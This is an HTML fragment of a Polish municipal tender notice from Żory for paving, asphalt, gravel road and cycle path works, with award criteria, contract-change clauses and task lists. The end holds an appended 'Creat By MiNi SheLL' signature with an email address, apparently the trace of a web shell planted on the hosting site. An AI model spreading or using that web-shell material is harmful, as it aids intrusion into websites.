<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia lub inny dokument potwierdzający ten fakt (jeżeli Wykonawca polega na zasobach innych podmiotów). 
W celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów zobowiązanie lub inny dokument, ponadto winno wskazywać: a) jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu, b) w jaki sposób zostaną wykorzystane zasoby innego podmiotu przez wykonawcę przy wykonywaniu zamówienia, c) jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem, d) jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji na przedmiot umowy (36, 42, 48 miesięcy) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Przyczyna/okoliczności    
Konieczność zmiany dokumentacji projektowej wynikła w trakcie realizacji inwestycji 
Skutek - zmiana w umowie/aneks
Zmiana terminu realizacji zamówienia o  tyle dni, ile trwało przeprojektowanie, dostawa materiałów i realizacja wynikłe ze zmian projektowych 
II. Przyczyna/okoliczności                                         
Wystąpienie zdarzeń losowych - klęska żywiołowa
Skutek - zmiana w umowie/aneks
Zmiana terminu wykonania zadania o tyle dni, ile trwało wstrzymanie robót 
III. Przyczyna/okoliczności                                         
Zmiana przepisów o podatku od towarów i usług 
Skutek - zmiana w umowie/aneks
zmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT 
IV. Przyczyna/okoliczności                                         
Przekształcenie firmy, zmiana nazwy firmy 
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy 
V. Przyczyna/okoliczności                                         
Zmiana lub rezygnacja z podwykonawcy będącego podmiotem na zasobach którego opierał się wykonawca w celu spełnienia warunków udziału w postępowaniu na zasadach art. 26 ust. 2b 
Skutek - zmiana w umowie/aneks
Wprowadzenie  innego podmiotu (Podwykonawca lub Wykonawca) który potwierdza spełnienie warunków w stopniu nie mniejszym niż wymagany w SIWZ 
VI. Przyczyna/okoliczności                                         
Długotrwałe, tj. powyżej 3 dni kalendarzowych, warunki atmosferyczne uniemożliwiające prowadzenie robót  zapisane w dzienniku budowy lub notatce służbowej, potwierdzone przez inspektora nadzoru
Skutek - zmiana w umowie/aneks
Przedłużenie terminu realizacji umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót 
VII. Przyczyna/okoliczności 
 Potrzeba wprowadzenia lub zmiany zakresu robót wykonywanych przez podwykonawcę.
Skutek - zmiana w umowie/aneks
Spisania aneksu do umowy określającego zakres robót wykonywanych przez podwykonawcę
VIII. Przyczyna/okoliczności 
Znalezienie niewybuchów lub znalezisk arhceologicznych
Skutek - zmiana w umowie/aneks
Przesunięcie terminu wykonania zadania o taki czas, ile trwało wstrzymanie robót związane z usunięciem niewybuchów lub prac archeologicznych
IX. Przyczyna/okoliczności 
Wstrzymanie prac budowlanych przez Zamawiającego lub właściwy organ z przyczyn niezawinionych przez Wykonawcę 
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile trwało wstrzymanie robót 
X. Przyczyna/okoliczności 
Wystąpienie zamówień dodatkowych, zgodnie z art. 67 ust.1 pkt.5
Skutek - zmiana w umowie/aneks
Zmiana terminu wykonania zadania o tyle dni, ile trwało wykonanie zamówień dodatkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zory.pl  menu przedmiotowe: Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, pokój 204, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2015 godzina 12:00, miejsce: Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, pokój - INFORMACJA parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin wykonania zamówienia:
część nr 1 - do 40 dni od daty podpisania umowy - termin wymagany
część nr 2 - do 60 dni od daty podpisania umowy - termin wymagany 
część nr 3 - do 40 dni od daty podpisania umowy - termin wymagany
część nr 4 -  nawierzchnie asfaltowe i brukowe  - do 60 dni od daty podpisania umowy - termin wymagany
etap I oznakowania ścieżek  - do 30 dni od daty podpisania umowy - termin wymagany
etap II oznakowania ścieżek - do 70 dni od daty podpisania umowy - termin wymagany

W kryterium 2 liczba punktów przyznawana będzie według poniższej zasady:
Przy obliczaniu liczby punktów w kryterium okres gwarancji Zamawiający zastosuje następujące wyliczenie:
1) za udzielenie gwarancji wynoszącej 36 miesięcy	- 0 punktów
2) za udzielenie gwarancji wynoszącej 42 miesiące	- 2,5 punktów 
3) za udzielenie gwarancji wynoszącej 48 miesięcy	- 5 punktów 

W niniejszym kryterium Wykonawca może uzyskać maksymalnie 5 pkt. 
Zgodnie z SIWZ zaoferowany okres gwarancji nie może być krótszy niż 36 miesięcy 
(w przypadku zaoferowania okresu gwarancji krótszego niż 36 miesięcy oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nawierzchnie z kostki brukowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1  Nawierzchnie z kostki brukowej:	
Zadanie 1 - Wykonanie nowej nawierzchni chodnika wzdłuż ul. Rybnickiej.
Zadanie 2 - Wykonanie nawierzchni parkingu z płyt ażurowych przy ul. Jubileuszowej.
Zadanie 3 - Wykonanie nowej nawierzchni chodnika przy pomniku Wojciecha Korfantego. 
Zadanie 4 - Wykonanie utwardzonych podestów brukowych przy dziewięciu urządzeniach siłowni zewnętrznej na os. Powstańców Śl. w Żorach.
Zadanie 5 - Wykonanie utwardzonych podestów brukowych przy siedmiu urządzeniach siłowni zewnętrznej na os. Pawlikowskiego w Żorach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na przedmiot umowy (36, 42, 48 miesięcy) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nawierzchnie asfaltowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 2  Nawierzchnie asfaltowe:	
Zadanie 1 - Wykonanie przebudowy skrzyżowania Obwodnicy Północnej z ul. Wygoda (wykonanie lewoskrętu).
Zadanie 2 - Wykonanie nowej nawierzchni asfaltowej odcinka drogi ul. Pukowca
Zadanie 3 - Wykonanie nowej nawierzchni asfaltowej odcinka drogi ul. Głównej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na przedmiot umowy (36, 42, 48 miesięcy) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Utwardzenie nawierzchni kruszywem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 3  Utwardzenie nawierzchni kruszywem tłuczniowym:
Zadanie 1 - Wykonanie utwardzonej nawierzchni drogi wraz z liniowym odwodnieniem ul. Srebrnej.
Zadanie 2 - Wykonanie utwardzonej nawierzchni drogi ul. Durantów. 
Zadanie 3 - Wykonanie utwardzonej nawierzchni drogi ul. Karpackiej.
Zadanie 4 - Wykonanie utwardzonej nawierzchni odcinka drogi ul. Poziomkowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji na przedmiot umowy (36, 42, 48 miesięcy) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Budowa i oznakowanie ścieżek rowerowych

..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 4  Budowa i oznakowanie ścieżek rowerowych:
Zadanie 1 - Wykonanie oznakowania pionowego i poziomego
Zadanie 2 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy Al. Wojska Polskiego wraz z przejściami 
Zadanie 3 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy ul. Folwareckiej wraz z przejściem 
Zadanie 4 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy Al. Niepodległości wraz z przejściami 
Zadanie 5 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy ul. Boryńskiej 
Zadanie 6 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy ul. Dąbrowskiego 
Zadanie 7 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy ul. Górne Przedmieście wraz z przejściem 
Zadanie 8 - Wykonanie nowej nawierzchni asfaltowej chodnika wzdłuż ul. Jubileuszowej wraz z poszerzeniem do 3,0m 
Zadanie 9 - Wykonanie nawierzchni asfaltowej chodnika przy ul. Rybnickiej wzdłuż ogrodzenia szkoły ZSBI w Żorach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9, 34.92.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji  na przedmiot umowy (36, 42, 48 miesięcy) - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com